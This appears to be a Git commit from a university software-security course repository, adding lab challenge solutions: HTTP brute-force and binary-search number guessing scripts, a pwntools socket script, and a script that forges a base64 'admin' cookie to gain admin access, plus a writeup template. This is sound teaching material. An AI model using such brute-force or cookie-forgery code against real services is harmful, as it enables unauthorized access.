didas/ssof_labs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Lab2

Browse Source
This commit is contained in:
didas72
2025-11-20 19:40:11 +00:00
parent 1cedbf433c
commit 8e185d6cfe
7 changed files with 107 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
.gitmodules vendored Normal file
View File

@@ -0,0 +1,3 @@
[submodule "pa/writeups"]
path = pa/writeups
url = git@gitlab.rnl.tecnico.ulisboa.pt:ssof2526/writeups/ist1106196.git

2
pa/.gitignore vendored Normal file
View File

@@ -0,0 +1,2 @@
**.vscode/
**__pycache__/

23
pa/lab2/chall_guess_big_number.py Normal file
View File

@@ -0,0 +1,23 @@
from requests import Session
BASE = "http://mustard.stt.rnl.tecnico.ulisboa.pt:25052"
sesh = Session()
resp = sesh.get(BASE+"/")
content = resp.content.decode('utf-8')
top = 100000
bot = 1
while top - bot > 1:
guess = int((top + bot) / 2)
resp = sesh.get(BASE+"/number/"+str(guess))
content = resp.content.decode('utf-8')
print(guess, content)
if "SSof" in content:
break
elif "Higher" in content:
bot = guess
else:
top = guess

15
pa/lab2/chall_guess_number.py Normal file
View File

@@ -0,0 +1,15 @@
from requests import Session
BASE = "http://mustard.stt.rnl.tecnico.ulisboa.pt:25051"
sesh = Session()
resp = sesh.get(BASE+"/")
content = resp.content.decode('utf-8')
for guess in range(1,1000):
resp = sesh.get(BASE+"/number/"+str(guess))
content = resp.content.decode('utf-8')
if "SSof" in content:
break
print(guess, content)

20
pa/lab2/chall_pwntools_sockets.py Normal file
View File

@@ -0,0 +1,20 @@
from pwn import *
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25055
conn = remote(HOST, PORT)
line = conn.recvline_contains(b"until").decode('utf-8')
target = line[54:-1]
current = "0"
print("Target:", target)
while target != current:
conn.send(b"MORE\n")
new = conn.recvline_contains(b"Here you have").decode('utf-8')[15:]
current = str(int(current) + int(new))
print("New:", new, "Current:", current)
conn.send(b"FINISH\n")
print(conn.recvall().decode('utf-8'))

22
pa/lab2/chall_secure.py Normal file
View File

@@ -0,0 +1,22 @@
from requests import Session
BASE = "http://mustard.stt.rnl.tecnico.ulisboa.pt:25056"
sesh = Session()
resp = sesh.get(BASE+"/")
content = resp.content.decode('utf-8')
print(content)
resp = sesh.post(BASE+"/", data={"username": "admin"})
content = resp.content.decode('utf-8')
print(content)
print(sesh.cookies)
for c in sesh.cookies:
if c.name == "user":
c.value = "YWRtaW4="
resp = sesh.get(BASE+"/")
content = resp.content.decode('utf-8')
print(content)
print(sesh.cookies)

22
pa/template_wu.md Normal file
View File

@@ -0,0 +1,22 @@
# Challenge XYZ writeup
- Vulnerability: What type of vulnerability is being exploited
- _Eg, SQL Injection, XSS, Endpoint is vulnerable to brute-force attack, etc_
- Where: Where is the vulnerability present
- _Eg, `/guess/number` endpoint_
- Impact: What results of exploiting this vulnerability
- _Eg, allows to find the server's guess by enumeration_
- NOTE: Any other observation
## Steps to reproduce
1. Do this
2. Do that
3. ...
N. Now something bad happened
## POC
```Py
```